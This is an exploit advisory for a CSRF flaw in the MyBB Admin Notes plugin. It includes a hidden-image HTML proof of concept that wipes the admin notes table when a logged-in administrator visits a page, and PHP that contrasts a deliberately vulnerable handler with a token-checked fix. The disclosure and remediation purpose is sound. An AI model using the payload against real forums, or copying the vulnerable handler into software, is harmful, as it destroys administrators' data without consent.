
# Exploit Title: MyBB Admin Notes Plugin - CSRF
# Date: 2018-05-14
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1106
# Version: 1.1
# Tested on: Ubuntu 18.04

# 1. Description: The plugin lets administrators save notes and display them in a list in the ACP. The action that empties the notes table (admin/index.php?empty=table) is reachable by a plain GET request and does not check a CSRF token, so any page an administrator visits while logged into the ACP can delete all admin notes simply by embedding that URL, for example in an image tag.

# 2. Proof of Concept:
# Host this page anywhere and have a logged-in ACP administrator open it. The browser fetches the image URL
# with the administrator's session cookie attached; no token is sent and none is checked, so the table is emptied.

<html>
<body>
<img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
</body>
</html>

# 3. Solution:
# Update to the latest release
# Patch: https://github.com/vintagedaddyo/MyBB_Plugin-adminnotes/commit/3deae701cdd89753cb6688302aee5b93a72bc58b?diff=split
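# The shape of the flaw described above and of a MyBB-idiomatic fix, as an added example. This is not the plugin's own code
# and not the linked patch: the function names, the table name adminnotes and the form markup are assumptions;
# $mybb->get_input(), $mybb->request_method, $mybb->post_code and verify_post_check() are MyBB core APIs.

```php
<?php
// Added example, not the plugin's code. The handler and table names are
// assumptions; the $mybb and $db calls and verify_post_check() are MyBB core.

// Vulnerable shape: the delete runs on any request carrying ?empty=table.
// A GET triggered by <img src="..."> on an attacker's page is sent with the
// administrator's ACP session cookie, so it empties the table.
function adminnotes_empty_vulnerable()
{
    global $mybb, $db;
    if ($mybb->get_input('empty') == 'table') {
        $db->delete_query('adminnotes'); // table name assumed
    }
}

// Hardened shape: a state change must arrive as a POST and must carry the
// per-session token MyBB exposes as $mybb->post_code. verify_post_check()
// compares the submitted my_post_key against that token; with the second
// argument set to true it returns false on mismatch instead of halting.
// A cross-site <img> GET fails the method check; a cross-site auto-submitted
// form fails the token check, because the attacker's page cannot read the
// victim's post_code.
function adminnotes_empty_fixed()
{
    global $mybb, $db;
    if ($mybb->request_method != 'post' || $mybb->get_input('empty') != 'table') {
        return;
    }
    if (!verify_post_check($mybb->get_input('my_post_key'), true)) {
        return; // token missing or wrong: do nothing, log if desired
    }
    $db->delete_query('adminnotes'); // table name assumed
}

// The ACP control that legitimately empties the notes must then submit the
// token with a POST. Markup a plugin would emit (assumed shape):
//
//   <form method="post" action="index.php?empty=table">
//     <input type="hidden" name="my_post_key" value="{$mybb->post_code}" />
//     <input type="submit" value="Empty notes" />
//   </form>
```

# Requiring POST alone is not enough (an attacker can auto-submit a cross-site form); the per-session token is the check that
# actually ties the request to the administrator's own ACP page, which is why MyBB's own admin actions all pass my_post_key.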